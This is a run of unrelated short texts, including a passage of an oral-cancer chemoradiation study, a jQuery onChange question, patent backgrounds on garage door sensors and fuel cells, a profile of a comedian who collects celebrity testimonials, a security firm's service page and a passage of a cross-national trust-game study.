clinically devised. A total of 45 patients (71%) were administered IC before chemoradiation. For analytical purposes, response assessment was graded in accordance with the NCI response criteria. 2.2. Radiotherapy {#sec2.2} ----------------- All patients underwent simulation and received a total dose of 55 Gy in 20 fractions at 2.75 Gy per fraction for five days a week. Radiotherapy was administered on either cobalt-60 or 6-MV linear accelerator with opposing anterior-posterior portals. The spinal cord was excluded after 30.25 Gy with shrinking field technique. Primary site was treated with a 2 cm clearance margin along with ipsilateral neck up to the lower border of the clavicle. Cone-down was done to exclude the spinal cord after 30.25 Gy. After cone-down, the gross disease was treated all the way. Single agent Cisplatin 75 mg/m^2^ was concurrently administered on days 1 and 22 in all patients. The severity of toxicity related to concurrent chemoradiation was graded according to common toxicity criteria (CTC). 2.3. Statistical Analysis {#sec2.3} ------------------------- All statistical analysis was performed using SPSS (Statistical Package for the Social Sciences) version 19. A *P* value \< 0.05 was considered statistically significant. Kaplan Meier curves were used to determine overall survival (OS), progression-free survival (PFS), and disease-free survival (DFS). Time for OS was calculated by subtracting date of last followup/death from date of biopsy and for DFS by subtracting date of relapse from the date of biopsy. For patients with residual disease clinically/radiologically, PFS was calculated from date of biopsy to date of progression. The hospital ethics committee granted exemption from formal review of this study. 3. Results {#sec3} ========== 3.1. Patient Demographics {#sec3.1} ------------------------- [Table 1](#tab1){ref-type="table"} demonstrates demographic traits of study population. Male to female ratio was 2.3 : 1. Betel nut chewing was positive in 29 (46%) patients. Nodal involvement was more frequent with T4 tumors (43% versus 3%). 3.2. Toxicity {#sec3.2} ------------- Summary of acute toxicity related to chemoradiation is shown in [Table 2](#tab2){ref-type="table"}. There were no treatment related deaths and no patient developed grade 4 toxicity related to either chemotherapy or radiation. A total of four patients required hospital admission related to toxic effects of chemotherapy. Severe renal impairment (grade 3) was seen in 1 (2%) patient. Two patients were admitted due to febrile neutropenia and 1 patient was admitted due to diarrhea and vomiting. There were no toxicity related deaths. 3.3. Response to Treatment {#sec3.3} -------------------------- [Table 3](#tab3){ref-type="table"} demonstrates response to IC and hypofractionated concurrent chemoradiation. A total of 45 patients received IC. After completion of IC, 8 (18%) patients had complete response, 33 (73%) had partial response, and 4 (9%) showed stable disease. After completion of concurrent hypofractionated chemoradiation, 39 (62%) patients were complete responders and 24 (38%) had persistent/progressive disease. Majority of patients with persistent/progressive disease at the completion of the treatment protocol had pretreatment nodal involvement. 3.4. Failures {#sec3.4} ------------- [Table 4](#tab4){ref-type="table"} demonstrates patterns of relapse. A total of 19 (48.7%) patients relapsed after a complete clinical response in 39 patients. Salvage surgery was performed in 6 patients of whom 4 had complete pathological response on histology while 2 had persistent disease. 3.5. Survival {#sec3.5} ------------- The OS and DFS were 30% and 49% at 5 years (Figures [2](#fig2){ref-type="fig"} and [3](#fig3){ref-type="fig"}). Grade and nodal status were the only statistically significant prognostic factors with respect to OS ([Table 5](#tab5){ref-type="table"}). Progression-free survival of the whole group at 5 years was 30% ([Figure 4](#fig4){ref-type="fig"}). The 5-year local control, regional control, and locoregional control were 58%, 84%, and 90%, respectively. 4. Discussion {#sec4} ============= In comparison with West where smoking is more common, betel nut chewing was the most common risk factor in the current study. Outcomes were reported based on actual 5-year followup of patients treated with concurrent hypofractionated radiation in a country with resource limited settings. A high percentage of patients presented with nodal involvement at the time of presentation. Gemcitabine based regimen with lower dose settings resulted in acceptable toxicity and good compliance and in combination with hypofractionation resulted in comparable overall and disease-free survival. Although surgery followed by radiation remains the mainstay treatment in the management of BMSCC, the advent of chemoradiation has diversified options \[[@B3]--[@B5]\]. Adequate resection with negative surgical margins and later reconstruction is clearly a challenge with locally advanced BMSCC. The decision to operate or not is dependent on both patient and resource-related factors. Patient-related factors such as unwillingness to consent to surgery, lack of affordability, and medical morbidity may limit surgery from being the treatment of choice. Resource-related factors that dictate operability nest in the availability of multidisciplinary teams for surgery, accessible resources for reconstruction, and the presence of rehabilitation centers. In the current study, tumors were generally bulky and infiltrative with evidence of gross tumor invasion into skin and submasseteric space. Thus, radical surgery with clear margins was difficult to achieve. Various studies have reported outcomes of single modality treatment for BMSCC. Nair and colleagues in their study on 234 patients of BMSCC treated with radiotherapy alone showed DFS of 41% and 15% for stages III and IV, respectively, and concluded that this treatment protocol is dismal \[[@B8]\]. With respect to surgery alone, Bloom and Spiro published their 13-year experience with 121 BMSCC patients. The 5-year determinate cure rate for stages III and IV disease was 27% and 18% \[[@B9]\]. CRT has become the standard of care for locoregionally advanced head and neck cancer with an absolute survival benefit of 8% at 5 years over radiation alone \[[@B10]\]. The 5-year OS and DFS in our study were 30% and 49%. Such a survival rate is not only equivocal when compared with established treatment modalities but is comparatively better considering the fact that 40% of our patients had stage IVb disease. The role of induction chemotherapy remains controversial and is continuously evolving for the last 3 decades. Although many phase III trials have shown that use of induction chemotherapy has no overall survival benefit in HNSCC, newer studies have shown a decrease in the incidence of distant metastasis and have opened new avenues for organ preservation \[[@B11]--[@B13]\]. We used induction primarily for two reasons. One is the advanced stage at which tumors generally presented to us with skin and muscle involvement. Induction chemotherapy not only melts the tumor but also reduces the pain and improves mouth opening and oral intake. Reducing the tumor size also reduces the necrotic tissue in oral cavity and thus improves the oral hygiene and overall performance status of patients for concurrent radiation or chemoradiation. Other advantage of induction was selection of patients that were responsive to chemotherapy. Our study showed that none of the patients who received induction chemotherapy developed distant metastasis. The debate for optimization of drugs for induction chemotherapy is far from over. Cisplatin and fluorouracil are the most extensively studied regimens. Despite high response rates, these regimens carry severe side effects \[[@B14]\]. The TAX 324 and TAX 323 trials have compared a two-drug regimen (Cisplatin and fluorouracil) with three-drug regimen (Cisplatin, fluorouracil, and docetaxel) and have shown later to be superior in terms of overall survival \[[@B15], [@B16]\]. In a developing country like Pakistan, huge tumor burden, limited treatment facilities, and affordability make it necessary to develop cheaper regimens with shorter duration of administration without compromising outcomes. A few phase II trials evaluated the chemotherapeutic activity of Gemcitabine in recurrent metastatic carcinoma of head and neck \[[@B17], [@B18]\]. Hitt and colleagues included 24 patients with recurrent and metastatic disease and 22.7% overall response rate was observed. They concluded that Cisplatin plus Gemcitabine combination has an acceptable toxicity profile in patients with recurrent and metastatic head and neck cancer \[[@B18]\]. Jamshed and colleagues in their study on treatment of locoregionally advanced nasopharyngeal carcinoma have used Gemcitabine and Cisplatin as induction chemotherapy. They have shown that 15% of patients had complete response after induction chemotherapy with good patient compliance and acceptable toxicity \[[@B19]\]. In the present study Gemcitabine was given in combination with Cisplatin as induction chemotherapeutic drug, which showed complete response in 18% patients. A recent study published has shown that Gemcitabine can induce host antitumor immune response that could facilitate antitumor effects in oral cancer \[[@B20]\]. In the current study, no chemotherapy related deaths were observed and only 4 patients required hospital admission. A lower than standard dose of induction Gemcitabine and concurrent Cisplatin probably resulted in lower toxicity in current study. In the conventional protocol for head and neck cancer, 70 Gy of radiation is delivered in 7 weeks at 2 Gy per day single fraction. Substantial data have unraveled that tumors of oral cavity undergo accelerated repopulation in the 4th week of conventional radiotherapy and thus require higher doses to overcome this undesired effect \[[@B21]\]. Hypofractionated concurrent radiotherapy in combination with chemotherapy has not been proven to provoke any substantial posttreatment tissue repopulation. Hypofractionated radiotherapy treatment is completed before accelerated repopulation becomes significant. Benefits of addition of chemotherapy to hypofractionated regimen are yet to be proven and dose optimized. Abrahim-al-Mamgani and collegaues treated 158 patients of advanced HNSCC with hypofractionated radiotherapy. They concluded that hypofractionated radiotherapy can be used for local and symptomatic control in palliative setting for advanced head and neck tumors. Sanghera and colleagues radically treated head and neck tumors with hypofractionated radiation and concurrent chemotherapy. Although only 7.4% of the patients had oral cavity tumors, OS for the whole group at 5 years was close to 50% \[[@B22]\]. On the other end of the spectrum, hyperfractionated radiotherapy has gained considerable popularity but the resource intense schedule is not feasible in resource limited settings \[[@B23]\]. Large fraction size in the hypofractionated radiotherapy regimen has been criticized for the development of late toxicity. Fowler compared conventional RT and hypofractionated RT and reported lower rate of late toxicity with hypofractionated regimen albeit comparable local control \[[@B24], [@B25]\]. Chan and colleagues in their study showed a 2-year OS of 50% for tumors of oral cavity treated with hypofractionated RT and concurrent carboplatin \[[@B26]\]. In the current study the OS and DFS of the whole group at 2 years were 42% and 64%, respectively. Although late toxicity related to radiotherapy was not formally documented in our study, patients tolerated the hypofractionated RT well with concurrent chemotherapy. A PEG tube was inserted in 35/63 patients prior to the start of the treatment. Duration of radiation ranged between 26 and 42 (mean 28) days. The reason for radiation completion in \<28 days was that patients came from all over the country and due to logistics problems treatment was completed over the weekends. In only 10 patients treatment completion required more than 30 days secondary to mechanical breakdown of machines. Also, we did not observe any hospital admissions related to radiation induced toxicity. Limitations of our study included retrospective design and lack of the documentation of late toxicity of radiation. Gemcitabine and Cisplatin were well tolerated and showed acceptable response with hypofractionated chemoradiation. Our disease-free survival and overall survival were comparable to outcomes reported with standard chemoradiation protocols. It is important to remember that the minimum followup in the current study was 5 years. The routine of hypofractionation combined with low dose Cisplatin allowed early completion of treatment and acceptable toxicity due to lower dose of concurrent Cisplatin. This might represent an effective treatment option in resource limited settings. However, validation in a randomized trial is warranted to confirm its applicability. Conflict of Interests ===================== The authors declare that there is no conflict of interests regarding the publication of this paper. ![Treatment protocol.](BMRI2015-963574.001){#fig1} ![Disease-free survival (DFS) in patients with locally advanced BMSCC.](BMRI2015-963574.002){#fig2} ![Overall survival (OS) in patients with locally advanced BMSCC.](BMRI2015-963574.003){#fig3} ![Progression-free survival (PFS) in patients with locally advanced BMSCC.](BMRI2015-963574.004){#fig4} ###### Patient characteristics. ---------------------------------------------------   Number\ Percent\ *N* = 63 (%) ----------------------------- ---------- ---------- Age (years)      \<40 07 11  \>40 56 89 Sex      Male 44 70  Female 19 30 ECOG (performance status)      0 11 18  1 52 82 Risk factors      Smoking 27/63 43  Pan (betel nut) 29/63 46  Naswar (tobacco chew) 17/63 27  Alcohol 0 0  No risk factors 9/63 14 Grade      Well (G1) 44 70  Moderate (G2) 15 24  Poor (G3) 04 6 Stage      III 05 8  IVa 33 52  IVb 25 40 T3      N0 05 7  N+ 02 3 T4      N0 29 46  N+ 27 43 Bone invasion 39 62 Retromolar trigone invasion 07 11 Percutaneous gastrostomy      Yes 35 56  No 28 44 Submasseteric space 25 40 Extractions of teeth 40 64 --------------------------------------------------- ###### Acute toxicity with induction chemotherapy and chemoradiation.   G0 G1 G2 G3 G4 -------------------- ----- ----- ----- ----- ------- ----- ----- ----- ----- ----- Anemia 58 92 4 6 1 (2) 2 ---   --- --- Neutropenia 34 54 5 8 10 16 4 6 --- --- Thrombocytopenia 54 86 7 11 1 2 1 2 --- --- Vomiting 57 90 3 5 2 3 1 2 --- --- Diarrhea 59 94 1 2 2 3 1 2 --- --- Creatinine 54 86 8 13 --- --- 1 2 --- --- Hyperbilirubinemia 63 100 --- --- --- --- --- --- --- --- Fever 61 97 2 3 --- --- --- --- --- --- Mucositis --- --- 23 36 32 51 8 13 --- --- ###### Response to treatment. ---------------------------------------------------------------------------------------------------------------------- Response after Induction chemotherapy Number\ Percent\ Number\ Percent\ Number\ Percent\ *N* = 63 (%) *N* = 63 (%) *N* = 63 (%) ---------------------------------------------------- ---------- ---------- ---------- ---------- ---------- ---------- Local              T3 --- --- 4 9 --- ---  T4 8 18 29 64 4 9 Regional              N0 4 9 15 34 2 4  N+ 4 9 18 40 2 4 Stage              III --- --- 4 9      IV 8 18 29 64 4 9 Response 6 weeks after completion of the treatment              T3 5 10 --- --- 2 3  T4 34 54 --- --- 22 35 Regional              N0 26 42 --- --- 8 13  N+ 13 20 --- --- 16 25 Stage              III 3 5 --- --- 2 3  IV 36 57 --- --- 22 35 ---------------------------------------------------------------------------------------------------------------------- CR: complete response; PR: more than 50% reduction; SD: less than 50% reduction; PD: persistent/progressive disease. ###### Patterns of failure in patients with complete clinical response. Recurrence site Number Percent ----------------- -------- --------- Local 13 21 Regional      Ipsilateral 1 6  Contralateral 3 Locoregional      Ipsilateral 2 3 ###### Influence of prognostic factors on overall survival. Prognostic indicator 5-year overall survival (%) *P* value --------------------------------- ----------------------------- ----------- Age      \<40 58 0.1  \>40 22 Gender      Male 30 0.3  Female 22 Stage      III 28 0.5  IV 29 Grade      Well 38 0.03  Moderate 10  Poor 22 Bone invasion      Yes 31 0.6  No 28 Submasseteric space involvement      Yes 38 0.9  No 25 Retromolar trigone involvement      Yes 12 0.5  No 32 Nodal status      N0 38 0.01  N+ 16 Induction chemotherapy      Yes 22 0.2  No 40 [^1]: Academic Editor: Quintin Pan
{ "pile_set_name": "PubMed Central" }
Q: Dynamic onchange with Jquery I am attempting to use jQuery to dynamically populate the onChange attribute in a text field to run multiple functions. However i get an error in the console stating TypeError: required is not a function When i type into the console required('test'); the function exists and returns true. HTML <input id="test"> jQuery var list_of_functions = get_validation(); //this returns a string "required('test'); valid('test');" $('#test').attr('onChange', list_of_functions); Then when i go and change the fieldtext, I get an error that the function doesnt exist. Any help? Thanks. A: Thanks to all the super helpful comments. I have found a better alternative to what I was attempting to do. How to turn a String into a javascript function call?
{ "pile_set_name": "StackExchange" }
A comparison of two methods in acquiring stimulus-response curves with transcranial magnetic stimulation. The stimulus-response (S-R) curve is a well accepted constituent in transcranial magnetic stimulation (TMS) studies. However, it has been suggested that parameters of the S-R curve differ when stimuli are provided in a "ramped" (measured steps from low to high intensity), or "random" fashion. We hypothesized that there would be no difference in the parameters of the S-R curve between either methodologies. Using a randomised cross-over design, 10 healthy participants (29.6 ± 6.4 yrs, 3 f) completed "ramped" or "random" curves in biceps brachii (BB) and first dorsal interosseous (FDI) muscles of both limbs. Curves were compared using mixed-factor ANOVA and correlated between limbs and methodologies. No differences (P > 0.05) and high correlations (range 0.71-0.97; P < 0.001) were observed in BB and FDI data between curves. This study demonstrated that either methodology provides similar parameters of the S-R curve in healthy participants.
{ "pile_set_name": "PubMed Abstracts" }
Obstacle detection systems for garage door openers are well known. One type of detector utilizes an infrared (IR) beam transmitted across the door opening and is sometimes to referred to as a "beam break" unit. In this obstruction detector system, an IR emitter and IR detector are disposed on opposite sides of the door opening and the emitter sends a beam of IR pulses to the receiver. If the beam is broken by an obstruction, the garage door opener (GDO) is signalled to inhibit initiation of door closure or, if the door is closing, to stop and reverse the movement of the door.
{ "pile_set_name": "USPTO Backgrounds" }
A fuel cell has been proposed as a clean, efficient and environmentally responsible power source for electric vehicles and various other applications. In particular, the fuel cell has been identified as a potential alternative for the traditional internal-combustion engine used in modern automobiles. One type of fuel cell is the polymer electrolyte membrane (PEM) fuel cell. The PEM fuel cell includes three basic components: a cathode; an anode; and an electrolyte membrane. The cathode and anode are generally formed from a finely divided catalyst, such as comminuted platinum. The electrolyte membrane is sandwiched between the cathode and the anode to form a membrane-electrode-assembly (MEA). The MEA is typically disposed between porous diffusion media (DM), such as carbon fiber paper, which facilitates a delivery of reactants such as hydrogen to the anode and oxygen to the cathode. The hydrogen is catalytically disassociated in the anode to generate free protons and electrons. The electrons from the anode cannot pass through the electrolyte membrane, and are instead directed through an electric load to perform work before being sent to the cathode. The protons pass through the electrolyte to the cathode. The protons react with the oxygen and the electrons in the cathode to generate water. Individual fuel cells can be stacked together in series to form a fuel cell stack. The fuel cell stack is capable of supplying a quantity of electricity sufficient to power a vehicle. Contamination of the electrolyte membrane after prolonged periods of use is known to affect the performance and durability of the PEM fuel cell. Typical contaminants may include pollutants from air drawn from the atmosphere as well as internal sources. Contaminants and errant chemical species may leach or migrate from fuel cell components, such as adhesives, seals, and the like, that can gradually break down over the lifetime of the fuel cell. It has been difficult to sufficiently assess PEM fuel cell contamination. In particular, the determination of contaminant type and quantity has been made difficult by the presence of the platinum catalyst in the MEA interfering with traditional analytical techniques. Additionally, although it is known to use air filters in fuel cell systems to scrub the cathode air supply, conventional air filters do not sufficiently remove the contaminants which may negatively affect the PEM fuel cell stack performance and the useful lifetime of the PEM fuel cell stack. There is a continuing need for a device that sufficiently filters contaminants and errant species from the reactant streams of the fuel cell stack. Desirably, the device facilitates an analysis of the types and quantities of contaminants and errant species present at the electrolyte membrane of the fuel cell stack.
{ "pile_set_name": "USPTO Backgrounds" }
How did comedian Dan Nainan get testimonials from Steve Wozniak, Hillary Clinton, President Obama, and countless celebrities? He just asked. A testimonial from a high-profile person can help boost your career, especially if you speak at events or freelance for large companies. advertisement advertisement Comedian Dan Nainan is often booked to perform at large corporate events, and one of the promotional tools he uses is celebrity testimonials. President Barack Obama says he is hilarious and former New York Mayor Michael Bloomberg calls him “hysterical.” In fact, you can watch them deliver their praise–along with Steve Wozniak, Hillary Clinton, and many other famous people–on a video he posted on his website. “Anyone can get a photo with a celebrity,” says Nainan. “Instead, I ask for a video testimonial after they’ve seen me perform. They’re almost always happy to oblige; I think it’s because I’ve done a great show and they enjoyed it.” Nainan has been able to get high-profile people to compliment his work by using one simple technique: He asks–but he says timing is everything. Request a testimonial when your work is fresh in the other person’s mind, says Nainan. “If you give a great presentation, people are almost hypnotized,” he says. “Two days later, they might not be as open. And if you bomb, don’t ask. In general, people who are caught up in the moment will be happy to help quickly without thinking.” Don’t stand there thinking, ‘How should I approach them?’” Don’t think about it; just ask. Approaching them immediately is imperative, says Nainan, who uses the “three-second rule” he learned from the book Big Game Hunting: Networking with Billionaires, Executives and Celebrities by Christopher Kai. “Don’t stand there thinking, ‘How should I approach them?’” he says. “Don’t think about it; just ask. Nothing is worse than wishing you had asked and regretting it later.” Nainan still regrets not asking tennis player Steffi Graf for a testimonial after he performed at an event she attended, and uses the experience as a lesson for not hesitating in the future. Nainan says how you ask is also important: “I’m as low a celebrity as you can get, but sometimes people ask me for photos and autographs,” he says. “I always say, ‘Hey no problem.’ This has helped me understand the mindset of the other person when I ask.” Nainan says it’s important to be polite and respectful. He also doesn’t frame the ask as a yes/no question, such as, “Would you mind giving me a testimonial?” “I say, ‘Hey, if you enjoyed my show, would you say a few words?” he says. “I have the camera on and running, so the process is very quick and easy.” It also helps to put yourself in the right place at the right time. When Nainan got President Obama’s testimonial, he was performing at a gala where the president was speaking. “I sat at the closest table to the president’s podium,” he says. “It looked like open seating, and I didn’t have any hesitation claiming a spot. When [Obama] came out to meet people, he walked down a line, and I was there waiting.” Instead of giving a camera to a friend, Nainan suggests you handle it yourself. “Don’t count on anybody else,” he says. “If you tell them, ‘Don’t touch the red button,’ they’ll almost always touch the red button.” advertisement Nainan learned this lesson when he asked a friend to record him with Apple co-founder Steve Wozniak; his friend stopped filming to fix Nainan’s tie. “I couldn’t believe I had to ask Steve Wozniak for a do-over,” he says. “When I met the president, I made sure my camera was running and I held it myself.” Once you get the testimonials, use them. Nainan sends the feedback reel to potential clients. He puts the video on his website and puts a link to it at the bottom of his email signature. He’s also using the quotes on the back cover of his forthcoming book. “When you’re sending someone references, you cannot get a better testimonial than the President of the United States,” he says. “In general, if you want something it sometimes takes moxie. The worst that can happen is they says ‘no.’”
{ "pile_set_name": "Pile-CC" }
Professional Information Security Services Get it right the first time We help ensure your security technologies are designed, implemented and integrated correctly the first time. This gives you the confidence to invest in new technology and successfully deploy it within your organisation without the headache finding the right people to implement it. It sets you up to more readily achieve a positive return on your security investment. We help by delivering the right skills and expertise to manage the different complexities of your chosen security technology. Our combined team has experience in security and solution architecture, cloud infrastructure, gateway, endpoint, email and web and security analytics. Key benefits of using our Professional Services: Reduce the cost of planning and implementing with predictable timelines Achieve outcomes with end-to-end management of your security Free-up your team to stay focused on business critical functions No need to find, hire and manage a contractor for a single project Maximise the value of your security solutions so you achieve a better security posture Implementation by certified and experienced local engineers with Australian industry experience Our engineers follow global and vendor best practices for all projects Call us Offices Engage our team today Subscribe to our newsletter Enter your email here to sign up for our security alerts & updates About us We are an Australian IT security integration and consulting firm with offices in Sydney, Melbourne and Brisbane. Founded in March 2000, we focus on protecting our customers’ brand, reputation and bottom line, through robust security architecture; secure cloud solutions and advanced forensics and remediation. more info
{ "pile_set_name": "Pile-CC" }
Humans tend to engage in costly behaviors that extend benefits to ingroup members (i.e., cooperate) and also actively engage in aggressive actions toward outgroup members. This phenomenon, known as parochial altruism, is pervasive and omnipresent in human history and across cultures ([@r1], [@r2]). Parochial altruism exacerbates intergroup relations either indirectly through actions that exclusively favor the ingroup (i.e., ingroup favoritism) or directly by actions that harm the outgroup ([@r3]). Here, we focus on ingroup favoritism in trust and cooperation. Decades of research have focused on the function, form, and process of the psychological and neural mechanisms underlying ingroup favoritism. One prominent approach addresses why people engage in ingroup favoritism and suggests that this is a strategy that functions to acquire direct, and especially indirect, benefits from ingroup members ([@r4]). Other approaches have investigated individual differences and who is more likely to favor the ingroup, including a focus on gender and social preferences for cooperation ([@r5]). A third approach theorizes about how variation across ecologies can determine where people are more likely to engage in ingroup favoritism ([@r6]). Although each of the above approaches forwards hypotheses about human universals and/or variation across societies, most research on ingroup favoritism is based on student samples using ad-hoc groups created in the laboratory within a limited range of societies ([@r7]). These conditions limit the generalizability of research and fail to address cross-societal variability in ingroup favoritism. Thus, cross-societal investigations are needed to understand why people cooperate more with ingroup members, who is more willing to display this ingroup favoritism, and where people are more likely to discriminate cooperation in favor of ingroup members. Here, we address these three fundamental questions in an experimental study using nationally representative samples from 17 countries and observe ingroup favoritism in a trust game with partners who share nationality vs. partners from a different nationality. Why Do People Trust and Cooperate More with Ingroup Members? {#s1} ============================================================ Decades of research have tried to solve the puzzle of why humans engage in costly cooperation that benefits others. Evolutionary perspectives propose that humans condition their cooperation when this behavior results in direct or indirect benefits. Bounded generalized reciprocity (BGR) proposes that people favor their group members because groups contain a network for reputation-based indirect reciprocity, and so this can be a strategy to maintain a positive reputation in the group, acquire indirect benefits from ingroup members, and avoid the cost of being ostracized from the group ([@r8]). From this perspective, humans have evolved to expect greater cooperation from ingroup members and to be more concerned about their reputation among ingroup, compared with outgroup, members ([@r4]). Support for BGR comes from studies that employed ad-hoc minimal groups created in the laboratory ([@r7]). These studies found that, even in contexts where people were categorized in groups according to some trivial category, ingroup favoritism was explained by expectations of partner cooperation. Furthermore, previous research used the common vs. unilateral knowledge paradigm to test the idea that ingroup favoritism is motivated by reputation-based indirect reciprocity ([@r4]). In this paradigm, individuals know that their interaction partner knows their group membership (common knowledge), or, alternatively, they know that their interaction partner is unaware of their membership (unilateral knowledge). Supporting BGR, people cooperate more with ingroup members only in the common knowledge condition ([@r7]). BGR hypothesizes that this should be a human universal, and here, we test this prediction across 17 countries. Specifically, we test the BGR prediction that people favor their group members when partners share knowledge (vs. unilateral knowledge) about their group membership and that this is mediated by expected partner cooperation. Who Displays Ingroup Favoritism in Trust and Cooperation? {#s2} ========================================================= Two individual differences that have been considered crucial in understanding cooperation within and between groups are gender and social value orientation (SVO). SVO is the dispositional weights people assign to their own and others' welfare during social interactions ([@r9]). Theories on parochial altruism hypothesize that the emergence of preferences for cooperation function to benefit the group ([@r10]), and so people with a dispositional cooperative preference should contribute to ingroup, but not necessarily outgroup, members. By contrast, alternative perspectives suggest that dispositional cooperative preferences (e.g., SVO and conditional cooperation) may be psychological mechanisms that function to maintain direct, as opposed to indirect, reciprocity ([@r9], [@r11]), and direct reciprocity is less strongly influenced by partner group membership ([@r7]). Thus, individuals with dispositional cooperative preferences could be universal cooperators who prefer cooperation, regardless of partner group membership. Ancestral human groups were likely characterized by patrilocality; that is, men resided in their same group throughout the lifespan, while women transferred groups upon sexual maturity or marriage ([@r12]). Moreover, males engaged more in intergroup conflict ([@r13]). Patrilocality and intergroup conflict could place selection pressure for a uniquely male coalitional psychology, and, indeed, men, relative to women, have been found to cooperate more with same-sex ingroup members, especially in the context of intergroup conflict ([@r14]). Here, we test the prediction that men, compared with women, are more likely to extend greater cooperation to ingroup than outgroup members. Where (and Under What Conditions) Do People Engage in Ingroup Favoritism? {#s3} ========================================================================= Previous theory claims that variation across environmental and social ecologies affect when people strongly invest in ingroup, compared with outgroup, members. However, previous research has primarily relied on self-report measures of values, such as collectivism, nationalism, and traditionalism ([@r15][@r16]--[@r17]). In a behavioral experiment conducted in 17 countries, we test three prominent historical--evolutionary perspectives on cross-societal variation in ingroup favoritism in cooperation: material security, religiosity, and pathogen stress. The material security hypothesis predicts that efficient societal institutions fulfill basic evolutionary needs (e.g., avoiding disease and evading physical harm), and this allows individuals to make relatively risky investments in relationships with strangers ([@r16]). By contrast, inefficient institutions require people to invest more in their ingroup as a strategy to secure basic needs. We used several indices of efficient societal institutions to test this hypothesis, including the rule of law, government effectiveness, and market competitiveness. In fact, previous work stresses how these indices of societal institutions relate to trust and cooperation in interpersonal relations. For example, trust in the judicial system and independent, well-functioning courts are hypothesized to relate to greater interpersonal trust ([@r18]), and government effectiveness can promote civic participation and cooperation ([@r19]). Furthermore, the extent of participation in a market economy can increase fair, cooperative relations among strangers ([@r20]), although this research was conducted on small-scale societies, and the present research involves large-scale modern societies that include extensive market integration. Importantly, this previous research has primarily focused on how these cross-societal indices relate to cooperative interactions between strangers, and here we test the prediction that these cross-societal conditions relate to ingroup favoritism in cooperation. Furthermore, the few studies that have considered how these indices predict ingroup favoritism did so by testing each variable separately using self-report surveys, as opposed to behavioral measures ([@r6]). Here, we can examine if either of these cross-societal indices of government effectiveness is more or less related to ingroup favoritism using a behavioral measure of trust and cooperation. Similarly, religiosity is theorized to fulfill the same basic needs as societal institutions ([@r21]), and so societies characterized by high religiosity---that is, societies with a high frequency of religious attendance, prevalent beliefs in heaven/hell, and/or a greater number of protestants---are expected to display less ingroup favoritism. Previous research has considered how religiosity relates to trust and cooperation across societies, and this work has resulted in mixed conclusions ([@r22], [@r23]). However, little previous research has tested whether varying levels of religiosity across societies relate to ingroup favoritism in cooperation ([@r6]). Finally, a pathogen-avoidance approach predicts that in societies with high pathogen load, people interact with ingroup members as a strategy to avoid contact with pathogens ([@r15]). Previous research supporting this hypothesis has used self-report measures of values, such as familism and ingroup assortativeness ([@r15]). Here, we examined if pathogen-rich societies, as measured by the historical disease prevalence index, produce greater amounts of ingroup favoritism using a behavioral measure of interpersonal trust and cooperation. The Current Research {#s4} ==================== We tested these hypotheses about ingroup favoritism in trust and cooperation in a behavioral experiment involving representative samples in 17 countries (*n* = 3,236; [*SI Appendix*, Table S1](#d35e347){ref-type="supplementary-material"}). An a priori power analysis determined a requirement of 93 participants per country to achieve 0.80 statistical power to detect an effect of partner group membership on behavior in the trust game (*d* = 0.26). We achieved this goal in every country. The experiment was the third wave in a longitudinal study, whereby participants completed different surveys in waves 1 and 2 that included measures of gender and SVO. All data were collected via the internet: Participants were sent a link to the online experiment that they completed in a location of their choice. The experiment in wave 3 involved participants making several one-shot decisions in the trust game ([@r24]), either as the trust person or the return person. The trust person decided to send any amount of an initial endowment of five monetary units (MUs) to the return person. The amount sent to the return person was tripled, and any amount kept for oneself remained the same. Then, the return person could decide to give back some of the tripled amount to the trust person. We used the strategy method to measure behavior of the return person, and the return person could decide how many MUs they would give back for each possible amount given by the trust person. The trust person decision was our measure of trust behavior, while the return person decision was our measure of trustworthiness (i.e., reciprocity). We also asked the trust person, after making their decision, how many MUs they expected their partner to return to them (i.e., expected partner trustworthiness). This was our measure of trustor expectation. These were the three dependent variables in our analyses. Importantly, trust behavior and trustworthiness can both be considered a measure of cooperation, since each decision is about incurring a cost to provide a benefit to another person, and both measures have been found in the past and present research to positively correlate ([@r25]) ([*SI Appendix*](#d35e347){ref-type="supplementary-material"}). That said, we conducted analyses on each variable separately, since there is an important structural difference between the decisions. The measure of trustor expectation is more closely tied to the construct of trust, i.e., belief about the intentions of another in a situation that contains a conflict of interest ([@r26]). Across decisions in the trust game, we varied partner's group membership and common knowledge of partner group membership. Participants interacted with partners who shared the same nationality (ingroup condition), with partners sampled from one of the other 16 countries excluding their own (outgroup condition), or with partners from an unknown country (stranger condition). Common knowledge of partner group membership consisted of two conditions. In the common knowledge condition, participants were aware that their partners would know about their nationality, but in the unilateral knowledge condition, participants were told that their partner would not know their nationality. Decisions with strangers were only made in the unilateral knowledge condition. Results {#s5} ======= Trust Behavior. {#s6} --------------- We created a contrast variable with partner's group membership (ingroup = 1; outgroup/stranger = 0), because this contrast captures a motive to treat ingroup members favorably relative to non-ingroup members. People extended greater trust behavior to ingroup members than outgroup members and strangers (*b* = 0.19; *P* \< 0.001). People also had higher trust behavior in the common knowledge condition, compared with the unilateral knowledge condition (*b* = 0.18; *P* \< 0.001), regardless of their partner's group membership. Group membership did not interact with the knowledge condition (*b* = −0.04; *P* = 0.14; [Fig. 1](#fig01){ref-type="fig"}). ![The forest plot displays the effect sizes of ingroup favoritism and common vs. unilateral knowledge of partner group membership predicting trust behavior. For each country, we report the estimated effect size (Cohen's *d*) and 95% confidence interval. The overall estimated population effect sizes are represented by the black diamonds, which correspond to the 95% confidence intervals. *n* = sample size for each country. Common/unilateral knowledge, manipulation of common vs. unilateral knowledge of partner group membership; *d*, Cohen's *d*; ingroup favoritism, contrast 1 (ingroup vs. outgroup + stranger); trust behavior, dependent variable as trustor behavior in the trust game.](pnas.1712921114fig01){#fig01} Trustor Expectation. {#s7} -------------------- People expected more cooperation from ingroup members than outgroup members and strangers (*b* = 0.29; *P* = 0.002). People also tended to expect more partner cooperation in the common knowledge condition, compared with the unilateral knowledge condition (*b* = 0.31; *P* \< 0.001). There was not a statistically significant interaction between partner's group membership and common/unilateral knowledge (*b* = 0.02; *P* = 0.74). We tested whether group membership influenced trust behavior through the mediation of expectations using the bootstrapping method for multilevel mediation. Expectations had a significant indirect effect: *b* = 0.11, 95% CI \[0.10, 0.13\]. The relation was partially mediated since the total effect of group membership on trust behavior (total effect = 0.21; *P* \< 0.001) remained significant when the mediator was included in the model (direct effect = 0.09; *P* \< 0.001). Trustworthiness. {#s8} ---------------- People tended to return relatively more to ingroup members, compared with outgroup members and strangers (*b* = 0.95; *P* = 0.001). People also tended to return more in the common knowledge condition, compared with the unilateral knowledge condition (*b* = 1.24; *P* \< 0.001), regardless of their partner's group membership; there was not a statistically significant interaction (*b* = 0.43; *P* = 0.18). Thus, our findings 